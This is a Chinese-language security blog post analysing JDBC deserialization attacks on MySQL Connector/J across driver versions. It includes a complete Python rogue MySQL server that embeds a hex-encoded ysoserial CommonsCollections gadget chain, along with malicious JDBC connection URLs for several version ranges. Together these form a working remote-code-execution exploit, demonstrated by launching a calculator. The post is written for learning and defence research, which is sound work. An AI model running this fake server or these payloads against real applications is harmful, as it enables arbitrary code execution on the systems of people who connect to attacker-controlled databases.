WebDog必学的JDBC反序列化 - Boogiepop Doesn't Laugh

https://tttang.com/archive/1877/#toc_jdbc_1
https://xz.aliyun.com/t/8159#toc-0

一、原理分析

（1）Java序列化对象的标识符

import java.io.*;

public class Car implements Serializable {

    private String name;
    public Car(){
        this.name ="car";
    }

    public static void main(String[] args) throws IOException, FileNotFoundException {
        Car car=new Car();
        FileOutputStream fos =new FileOutputStream("output");
        ObjectOutputStream oos =new ObjectOutputStream(fos);
        oos.writeObject(car);
        oos.close();
    }
}

运行程序输出得到一个序列化文件，看看他的十六进制会发现：

前两个字节固定为-84和-19，这一点在后面会回收伏笔，我们先记住这一个特性即可

（2）寻找readObject触发点

直接说结论，漏洞点在于com.mysql.cj.jdbc.result.ResultSetImpl.getObject()，我们看看该方法内部：

public Object getObject(int columnIndex) throws SQLException {
       try {
           this.checkRowPos();
           this.checkColumnBounds(columnIndex);
           int columnIndexMinusOne = columnIndex - 1;
           if (this.thisRow.getNull(columnIndexMinusOne)) {
               return null;
           } else {
               Field field = this.columnDefinition.getFields()[columnIndexMinusOne];
               switch (field.getMysqlType()) {
                   case BIT:
                       if (!field.isBinary() && !field.isBlob()) {
                           return field.isSingleBit() ? this.getBoolean(columnIndex) : this.getBytes(columnIndex);
                       } else {
                           byte[] data = this.getBytes(columnIndex);
                           if (!(Boolean)this.connection.getPropertySet().getBooleanProperty("autoDeserialize").getValue()) {
                               return data;
                           } else {
                               Object obj = data;
                               if (data != null && data.length >= 2) {
                                   if (data[0] != -84 || data[1] != -19) {
                                       return this.getString(columnIndex);
                                   }

                                   try {
                                       ByteArrayInputStream bytesIn = new ByteArrayInputStream(data);
                                       ObjectInputStream objIn = new ObjectInputStream(bytesIn);
                                       obj = objIn.readObject();
                                       objIn.close();
                                       bytesIn.close();
                                   } catch (ClassNotFoundException var13) {
                                       throw SQLError.createSQLException(Messages.getString("ResultSet.Class_not_found___91") + var13.toString() + Messages.getString("ResultSet._while_reading_serialized_object_92"), this.getExceptionInterceptor());
                                   } catch (IOException var14) {
                                       obj = data;
                                   }
                               }

                               return obj;
                           }
                       }

在readObject前有一个判断，那就是if (data[0] != -84 || data[1] != -19),这2个数字熟不熟悉，这个用来判断是否为序列化对象，如果是的话才能进入readObject方法被调用
那么哪里又调用了getObject方法呢
com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor.populateMapWithSessionStatusValues()中调用了，跟进看看：

执行ResultSetUtil.resultSetToMap(toPopulate, rs);方法，跟进该方法

在方法内执行了getObject方法，至此闭环，现在需要搞清楚的就是上面的toPopulate和rs究竟是个什么

rs实际上是服务端执行SQL语句SHOW SESSION STATUS后返回的结果，那么这就让我们不由得联想恶意mysql服务端了，如果有这么一个evil mysql，可以控制rs的值，那么可能就可以触发反序列化链了

并且注意在getObject中要求autoDeserialize需要为true，这也是JDBC URL中为啥要加上true的原因

（3）Mysql认证报文

先准备一手clinet：

import java.sql.*;

public class Client {
    public static void main(String[] args) throws ClassNotFoundException, SQLException {
        String Driver = "com.mysql.cj.jdbc.Driver";

        String DB_URL = "jdbc:mysql://127.0.0.1:3306/mysql?characterEncoding=utf8&useSSL=false&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true&serverTimezone=GMT%2B8";
        Class.forName(Driver);
        Connection conn = DriverManager.getConnection(DB_URL,"root","xxxxxx");
    }
}

用WIreshark抓一手包，过滤条件为tcp.port ==3306 && mysql：

不难发现其实mysql也是有类似tcp一样的认证系统的，有Request和Response，简单的看一个Response OK包：

MYSQL Protocol就是认证报文了为0700000200000002000000，也就是说我们恶意服务端只需要将该数据返回给Request即可完成认证，再看看问候报文：

直接发送原始数据即可，恶意服务端可以将这部分改为恶意payload，之后进行反序列化

二、ServerStatusDiffInterceptor链

（1）8.0.7-8.0.20

其实上述讲的就是该链，这里我们来分析一下，根据上面的思路备好一个恶意mysql服务端：

# -*- coding:utf-8 -*-
#@Time : 2020/7/27 2:10
#@Author: Tri0mphe7
#@File : server.py
import socket
import binascii
import os

greeting_data="4a0000000a352e372e31390008000000463b452623342c2d00fff7080200ff811500000000000000000000032851553e5c23502c51366a006d7973716c5f6e61746976655f70617373776f726400"
response_ok_data="0700000200000002000000"

def receive_data(conn):
    data = conn.recv(1024)
    print("[*] Receiveing the package : {}".format(data))
    return str(data).lower()

def send_data(conn,data):
    print("[*] Sending the package : {}".format(data))
    conn.send(binascii.a2b_hex(data))

def get_payload_content():
    #file文件的内容使用ysoserial生成的 使用规则  java -jar ysoserial [common7那个]  "calc" > a 
    file= r'a'
    if os.path.isfile(file):
        with open(file, 'rb') as f:
            payload_content = str(binascii.b2a_hex(f.read()),encoding='utf-8')
        print("open successs")

    else:
        print("open false")
        #calc
        payload_content='aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00187371007e0013757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000463616c63740004657865637571007e001b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878'
    return payload_content

# 主要逻辑
def run():

    while 1:
        conn, addr = sk.accept()
        print("Connection come from {}:{}".format(addr[0],addr[1]))

        # 1.先发送第一个 问候报文
        send_data(conn,greeting_data)

        while True:
            # 登录认证过程模拟  1.客户端发送request login报文 2.服务端响应response_ok
            receive_data(conn)
            send_data(conn,response_ok_data)

            #其他过程
            data=receive_data(conn)
            #查询一些配置信息,其中会发送自己的 版本号
            if "session.auto_increment_increment" in data:
                _payload='01000001132e00000203646566000000186175746f5f696e6372656d656e745f696e6372656d656e74000c3f001500000008a0000000002a00000303646566000000146368617261637465725f7365745f636c69656e74000c21000c000000fd00001f00002e00000403646566000000186368617261637465725f7365745f636f6e6e656374696f6e000c21000c000000fd00001f00002b00000503646566000000156368617261637465725f7365745f726573756c7473000c21000c000000fd00001f00002a00000603646566000000146368617261637465725f7365745f736572766572000c210012000000fd00001f0000260000070364656600000010636f6c6c6174696f6e5f736572766572000c210033000000fd00001f000022000008036465660000000c696e69745f636f6e6e656374000c210000000000fd00001f0000290000090364656600000013696e7465726163746976655f74696d656f7574000c3f001500000008a0000000001d00000a03646566000000076c6963656e7365000c210009000000fd00001f00002c00000b03646566000000166c6f7765725f636173655f7461626c655f6e616d6573000c3f001500000008a0000000002800000c03646566000000126d61785f616c6c6f7765645f7061636b6574000c3f001500000008a0000000002700000d03646566000000116e65745f77726974655f74696d656f7574000c3f001500000008a0000000002600000e036465660000001071756572795f63616368655f73697a65000c3f001500000008a0000000002600000f036465660000001071756572795f63616368655f74797065000c210009000000fd00001f00001e000010036465660000000873716c5f6d6f6465000c21009b010000fd00001f000026000011036465660000001073797374656d5f74696d655f7a6f6e65000c21001b000000fd00001f00001f000012036465660000000974696d655f7a6f6e65000c210012000000fd00001f00002b00001303646566000000157472616e73616374696f6e5f69736f6c6174696f6e000c21002d000000fd00001f000022000014036465660000000c776169745f74696d656f7574000c3f001500000008a000000000020100150131047574663804757466380475746638066c6174696e31116c6174696e315f737765646973685f6369000532383830300347504c013107343139343330340236300731303438353736034f4646894f4e4c595f46554c4c5f47524f55505f42592c5354524943545f5452414e535f5441424c45532c4e4f5f5a45524f5f494e5f444154452c4e4f5f5a45524f5f444154452c4552524f525f464f525f4449564953494f4e5f42595f5a45524f2c4e4f5f4155544f5f4352454154455f555345522c4e4f5f454e47494e455f535542535449545554494f4e0cd6d0b9fab1ead7bccab1bce4062b30383a30300f52455045415441424c452d5245414405323838303007000016fe000002000000'
                send_data(conn,_payload)
                data=receive_data(conn)
            elif "show warnings" in data:
                _payload = '01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f000059000005075761726e696e6704313238374b27404071756572795f63616368655f73697a6527206973206465707265636174656420616e642077696c6c2062652072656d6f76656420696e2061206675747572652072656c656173652e59000006075761726e696e6704313238374b27404071756572795f63616368655f7479706527206973206465707265636174656420616e642077696c6c2062652072656d6f76656420696e2061206675747572652072656c656173652e07000007fe000002000000'
                send_data(conn, _payload)
                data = receive_data(conn)
            if "set names" in data:
                send_data(conn, response_ok_data)
                data = receive_data(conn)
            if "set character_set_results" in data:
                send_data(conn, response_ok_data)
                data = receive_data(conn)
            if "show session status" in data:
                mysql_data = '0100000102'
                mysql_data += '1a000002036465660001630163016301630c3f00ffff0000fc9000000000'
                mysql_data += '1a000003036465660001630163016301630c3f00ffff0000fc9000000000'
                # 为什么我加了EOF Packet 就无法正常运行呢？？
                //获取payload
                payload_content=get_payload_content()
                //计算payload长度
                payload_length = str(hex(len(payload_content)//2)).replace('0x', '').zfill(4)
                payload_length_hex = payload_length[2:4] + payload_length[0:2]
                //计算数据包长度
                data_len = str(hex(len(payload_content)//2 + 4)).replace('0x', '').zfill(6)
                data_len_hex = data_len[4:6] + data_len[2:4] + data_len[0:2]
                mysql_data += data_len_hex + '04' + 'fbfc'+ payload_length_hex
                mysql_data += str(payload_content)
                mysql_data += '07000005fe000022000100'
                send_data(conn, mysql_data)
                data = receive_data(conn)
            if "show warnings" in data:
                payload = '01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f00006d000005044e6f74650431313035625175657279202753484f572053455353494f4e20535441545553272072657772697474656e20746f202773656c6563742069642c6f626a2066726f6d2063657368692e6f626a73272062792061207175657279207265777269746520706c7567696e07000006fe000002000000'
                send_data(conn, payload)
            break


if __name__ == '__main__':
    HOST ='0.0.0.0'
    PORT = 3309

    sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    #当socket关闭后，本地端用于该socket的端口号立刻就可以被重用.为了实验的时候不用等待很长时间
    sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sk.bind((HOST, PORT))
    sk.listen(1)

    print("start fake mysql server listening on {}:{}".format(HOST,PORT))

    run()

import java.sql.*;

public class Client {
    public static void main(String[] args) throws ClassNotFoundException, SQLException {
        String driver = "com.mysql.cj.jdbc.Driver";
        String DB_URL = "jdbc:mysql://127.0.0.1:3309/mysql?characterEncoding=utf8&useSSL=false&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true";//8.x使用
        Class.forName(driver);
        Connection conn = DriverManager.getConnection(DB_URL);

    }
}

准备如上即可弹出计算机：

看看调试流程：

跟进getConnection

调用了另一个getConnection，跟进

进入connect方法，参数啥还是没变

进入getInstance方法

调用ConnectionImpl，参数就是evil mysql的一些参数

public ConnectionImpl(HostInfo hostInfo) throws SQLException {

        try {
            // Stash away for later, used to clone this connection for Statement.cancel and Statement.setQueryTimeout().
            this.origHostInfo = hostInfo;
            this.origHostToConnectTo = hostInfo.getHost();
            this.origPortToConnectTo = hostInfo.getPort();

            this.database = hostInfo.getDatabase();
            this.user = StringUtils.isNullOrEmpty(hostInfo.getUser()) ? "" : hostInfo.getUser();
            this.password = StringUtils.isNullOrEmpty(hostInfo.getPassword()) ? "" : hostInfo.getPassword();

            this.props = hostInfo.exposeAsProperties();

            this.propertySet = new JdbcPropertySetImpl();

            this.propertySet.initializeProperties(this.props);

            // We need Session ASAP to get access to central driver functionality
            this.nullStatementResultSetFactory = new ResultSetFactory(this, null);
            this.session = new NativeSession(hostInfo, this.propertySet);
            this.session.addListener(this); // listen for session status changes

            // we can't cache fixed values here because properties are still not initialized with user provided values
            this.autoReconnectForPools = this.propertySet.getBooleanProperty(PropertyDefinitions.PNAME_autoReconnectForPools);
            this.cachePrepStmts = this.propertySet.getBooleanProperty(PropertyDefinitions.PNAME_cachePrepStmts);
            this.autoReconnect = this.propertySet.getBooleanProperty(PropertyDefinitions.PNAME_autoReconnect);
            this.useUsageAdvisor = this.propertySet.getBooleanProperty(PropertyDefinitions.PNAME_useUsageAdvisor);
            this.reconnectAtTxEnd = this.propertySet.getBooleanProperty(PropertyDefinitions.PNAME_reconnectAtTxEnd);
            this.emulateUnsupportedPstmts = this.propertySet.getBooleanProperty(PropertyDefinitions.PNAME_emulateUnsupportedPstmts);
            this.ignoreNonTxTables = this.propertySet.getBooleanProperty(PropertyDefinitions.PNAME_ignoreNonTxTables);
            this.pedantic = this.propertySet.getBooleanProperty(PropertyDefinitions.PNAME_pedantic);
            this.prepStmtCacheSqlLimit = this.propertySet.getIntegerProperty(PropertyDefinitions.PNAME_prepStmtCacheSqlLimit);
            this.useLocalSessionState = this.propertySet.getBooleanProperty(PropertyDefinitions.PNAME_useLocalSessionState);
            this.useServerPrepStmts = this.propertySet.getBooleanProperty(PropertyDefinitions.PNAME_useServerPrepStmts);
            this.processEscapeCodesForPrepStmts = this.propertySet.getBooleanProperty(PropertyDefinitions.PNAME_processEscapeCodesForPrepStmts);
            this.useLocalTransactionState = this.propertySet.getBooleanProperty(PropertyDefinitions.PNAME_useLocalTransactionState);
            this.disconnectOnExpiredPasswords = this.propertySet.getBooleanProperty(PropertyDefinitions.PNAME_disconnectOnExpiredPasswords);
            this.readOnlyPropagatesToServer = this.propertySet.getBooleanProperty(PropertyDefinitions.PNAME_readOnlyPropagatesToServer);

            String exceptionInterceptorClasses = this.propertySet.getStringProperty(PropertyDefinitions.PNAME_exceptionInterceptors).getStringValue();
            if (exceptionInterceptorClasses != null && !"".equals(exceptionInterceptorClasses)) {
                this.exceptionInterceptor = new ExceptionInterceptorChain(exceptionInterceptorClasses, this.props, this.session.getLog());
            }

            if (this.cachePrepStmts.getValue()) {
                createPreparedStatementCaches();
            }

            if (this.propertySet.getBooleanProperty(PropertyDefinitions.PNAME_cacheCallableStmts).getValue()) {
                this.parsedCallableStatementCache = new LRUCache<>(
                        this.propertySet.getIntegerProperty(PropertyDefinitions.PNAME_callableStmtCacheSize).getValue());
            }

            if (this.propertySet.getBooleanProperty(PropertyDefinitions.PNAME_allowMultiQueries).getValue()) {
                this.propertySet.getProperty(PropertyDefinitions.PNAME_cacheResultSetMetadata).setValue(false); // we don't handle this yet
            }

            if (this.propertySet.getBooleanProperty(PropertyDefinitions.PNAME_cacheResultSetMetadata).getValue()) {
                this.resultSetMetadataCache = new LRUCache<>(this.propertySet.getIntegerProperty(PropertyDefinitions.PNAME_metadataCacheSize).getValue());
            }

            if (this.propertySet.getStringProperty(PropertyDefinitions.PNAME_socksProxyHost).getStringValue() != null) {
                this.propertySet.getProperty(PropertyDefinitions.PNAME_socketFactory).setValue(SocksProxySocketFactory.class.getName());
            }

            this.pointOfOrigin = this.useUsageAdvisor.getValue() ? LogUtils.findCallingClassAndMethod(new Throwable()) : "";

            this.dbmd = getMetaData(false, false);

            initializeSafeQueryInterceptors();

        } catch (CJException e1) {
            throw SQLExceptionsMapping.translateException(e1, getExceptionInterceptor());
        }

        try {
            createNewIO(false);

            unSafeQueryInterceptors();

            NonRegisteringDriver.trackConnection(this);
        } catch (SQLException ex) {
            cleanup(ex);

            // don't clobber SQL exceptions
            throw ex;
        } catch (Exception ex) {
            cleanup(ex);

            throw SQLError
                    .createSQLException(
                            this.propertySet.getBooleanProperty(PropertyDefinitions.PNAME_paranoid).getValue() ? Messages.getString("Connection.0")
                                    : Messages.getString("Connection.1",
                                            new Object[] { this.session.getHostInfo().getHost(), this.session.getHostInfo().getPort() }),
                            MysqlErrorNumbers.SQL_STATE_COMMUNICATION_LINK_FAILURE, ex, getExceptionInterceptor());
        }

    }

这里面有点长，也就是ConnectionImpl这里和其他版本有所不同，在这里首先会进入initializeSafeQueryInterceptors();初始化请求监听器，然后再到createNewIO(false)

调用connectOneTryOnly参数为false，跟进

继续初始化initializePropsFromServer();

在里面又调用了handleAutoCommitDefaults()：

调用setAutoCommit设为true

调用execSQL执行SQL语句，下面就进入主要逻辑了

发送SQL请求数据包


调用invokeQueryInterceptorsPre

调用了preProcess函数，参数sql就是查询语句设置autocommit自动提交为true


就问你pupulateMap这东西你熟悉不熟悉吧，在一开始见到了

调用ResultSetUtil.resultSetToMap(toPopulate, rs)
这里的rs就是恶意的SQL服务端返回的数据

然后就是调用getObject进行反序列化，这就是最开始分析的一条链子，这里的jdbc版本是8,低版本大致流程也是这样，只有少数异同点，但最后都是进入getObject方法触发反序列化

（2）5.1.0-5.1.10

String url = "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections4_calc";
String username = "yso_CommonsCollections4_calc";
String password = "";
Class.forName("com.mysql.jdbc.Driver");
conn = DriverManager.getConnection(url,username,password);
String sql = "select database()";
PreparedStatement ps = conn.prepareStatement(sql);
//执行查询操作，返回的是数据库结果集的数据表
ResultSet resultSet = ps.executeQuery();

payload如上

（3）5.1.11-5.x.xx

String url = "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections4_calc";
String username = "yso_CommonsCollections4_calc";
String password = "";
Class.forName("com.mysql.jdbc.Driver");
conn = DriverManager.getConnection(url,username,password);

（4）6.x

String url = "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections4_calc";
String username = "yso_CommonsCollections4_calc";
String password = "";
Class.forName("com.mysql.jdbc.Driver");
conn = DriverManager.getConnection(url,username,password);

（5）8.20以后

这以后进入populateMapWithSessionStatusValues后不会再调用getObject，因此直接GG

三、detectCustomCollations链

（1）6.0.2-6.0.6

import java.sql.*;

public class Client {
    public static void main(String[] args) throws ClassNotFoundException, SQLException {
        Connection conn=null;
        String url = "jdbc:mysql://127.0.0.1:3309/mysql?detectCustomCollations=true&autoDeserialize=true&user=yso_CommonsCollections7_calc";
        String username = "yso_CommonsCollections7_calc";
        String password = "";
        Class.forName("com.mysql.jdbc.Driver");
        conn = DriverManager.getConnection(url, username, password);

    }
}

这里username有讲究，用到了一个开源工具fake_mysql:
https://github.com/fnmsd/MySQL_Fake_Server
用法自己查找，需要注意的有2点，python版本低于3.8，然后config.json里面的路径中的反斜杠用2个，这样就不会报错
之后运行直接弹计算机

也是下断点看看：
直接到不同的地方看看，也会进入createNewIo这个方法


调用相同的方法
initializePropsFromServer()

在这里就有所不同了，这里咱们调用了buildCollationMapping()方法。跟进

之前这里是允许SHOW SESSION STATUS，这里是SHOW COLLATION,不管命令是什么，都调用了ResultSetUtil.resultSetToMap，然后就是之前同样的一套流程按摩

（2）8.x.x

在initializePropsFromServer()方法中

private void initializePropsFromServer() throws SQLException {
    String connectionInterceptorClasses = this.getPropertySet().getStringReadableProperty("connectionLifecycleInterceptors").getStringValue();
    this.connectionLifecycleInterceptors = null;
    if (connectionInterceptorClasses != null) {
        try {
            this.connectionLifecycleInterceptors = (List)Util.loadClasses(this.getPropertySet().getStringReadableProperty("connectionLifecycleInterceptors").getStringValue(), "Connection.badLifecycleInterceptor", this.getExceptionInterceptor()).stream().map((o) -> {
                return o.init(this, this.props, this.session.getLog());
            }).collect(Collectors.toList());
        } catch (CJException var8) {
            throw SQLExceptionsMapping.translateException(var8, this.getExceptionInterceptor());
        }
    }

    this.session.setSessionVariables();
    if ((Boolean)this.useServerPrepStmts.getValue()) {
        this.useServerPreparedStmts = true;
    }

    this.session.loadServerVariables(this.getConnectionMutex(), this.dbmd.getDriverVersion());
    this.autoIncrementIncrement = this.session.getServerVariable("auto_increment_increment", 1);
    //调用buildCollationMapping()方法
    this.session.buildCollationMapping();

    try {
        LicenseConfiguration.checkLicenseType(this.session.getServerVariables());
    } catch (CJException var7) {
        throw SQLError.createSQLException(var7.getMessage(), "08001", this.getExceptionInterceptor());
    }
com.mysql.cj.mysqla.MysqlaSession#buildCollationMapping()方法

public void buildCollationMapping() {
    Map<Integer, String> customCharset = null;
    Map<String, Integer> customMblen = null;
    String databaseURL = this.hostInfo.getDatabaseUrl();
    if ((Boolean)this.cacheServerConfiguration.getValue()) {
        synchronized(customIndexToCharsetMapByUrl) {
            customCharset = (Map)customIndexToCharsetMapByUrl.get(databaseURL);
            customMblen = (Map)customCharsetToMblenMapByUrl.get(databaseURL);
        }
    }

    if (customCharset == null && (Boolean)this.getPropertySet().getBooleanReadableProperty("detectCustomCollations").getValue()) {
        customCharset = new HashMap();
        customMblen = new HashMap();
        ValueFactory<Integer> ivf = new IntegerValueFactory();

        PacketPayload resultPacket;
        Resultset rs;
        try {
            //此处不再调用getObject()方法，此链失效
            resultPacket = this.sendCommand(this.commandBuilder.buildComQuery(this.getSharedSendPacket(), "SHOW COLLATION"), false, 0);
            rs = this.protocol.readAllResults(-1, false, resultPacket, false, (ColumnDefinition)null, new ResultsetFactory(Type.FORWARD_ONLY, (Resultset.Concurrency)null));
            ValueFactory<String> svf = new StringValueFactory(rs.getColumnDefinition().getFields()[1].getEncoding());

            Row r;
            while((r = (Row)rs.getRows().next()) != null) {
                int collationIndex = ((Number)r.getValue(2, ivf)).intValue();
                String charsetName = (String)r.getValue(1, svf);
                if (collationIndex >= 2048 || !charsetName.equals(CharsetMapping.getMysqlCharsetNameForCollationIndex(collationIndex))) {
                    ((Map)customCharset).put(collationIndex, charsetName);
                }

                if (!CharsetMapping.CHARSET_NAME_TO_CHARSET.containsKey(charsetName)) {
                    ((Map)customMblen).put(charsetName, (Object)null);
                }
            }
        } catch (PasswordExpiredException var17) {
            if ((Boolean)this.disconnectOnExpiredPasswords.getValue()) {
                throw var17;
            }
        } catch (IOException var18) {
            throw ExceptionFactory.createException(var18.getMessage(), var18, this.exceptionInterceptor);
        }

在buildCollationMapping中不再调用ResultSetUtil.resultSetToMap
寄了

（3）5.1.49

在buildCollation里：

private void buildCollationMapping() throws SQLException {
    ...
    if (customCharset == null && this.getDetectCustomCollations() && this.versionMeetsMinimum(4, 1, 0)) {
    java.sql.Statement stmt = null;
    ResultSet results = null;

    try {
        customCharset = new HashMap();
        customMblen = new HashMap();
        stmt = this.getMetadataSafeStatement();

        try {
            results = stmt.executeQuery("SHOW COLLATION");

            while(results.next()) {
                //不再调用getObject()
                int collationIndex = results.getInt(3);
                String charsetName = results.getString(2);
                if (collationIndex >= 2048 || !charsetName.equals(CharsetMapping.getMysqlCharsetNameForCollationIndex(collationIndex))) {
                    ((Map)customCharset).put(collationIndex, charsetName);
                }

                if (!CharsetMapping.CHARSET_NAME_TO_CHARSET.containsKey(charsetName)) {
                    ((Map)customMblen).put(charsetName, (Object)null);
                }
            }
            ...

也不调用resultSeToMap了
寄了

（4）5.1.41-5.1.48

String url = "jdbc:mysql://127.0.0.1:3306/test?detectCustomCollations=true&autoDeserialize=true&user=yso_CommonsCollections4_calc";
String username = "yso_CommonsCollections4_calc";
String password = "";
Class.forName("com.mysql.jdbc.Driver");
conn = DriverManager.getConnection(url,username,password);

（5）5.1.29-5.1.40

String url = "jdbc:mysql://127.0.0.1:3306/test?detectCustomCollations=true&autoDeserialize=true&user=yso_CommonsCollections4_calc";
String username = "yso_CommonsCollections4_calc";
String password = "";
Class.forName("com.mysql.jdbc.Driver");
conn = DriverManager.getConnection(url,username,password);

（6）5.1.19-5.1.28

String url = "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&user=yso_CommonsCollections4_calc";
String username = "yso_CommonsCollections4_calc";
String password = "";
Class.forName("com.mysql.jdbc.Driver");
conn = DriverManager.getConnection(url,username,password);

（7）5.1.19以下

不调用resultSeToMap
寄了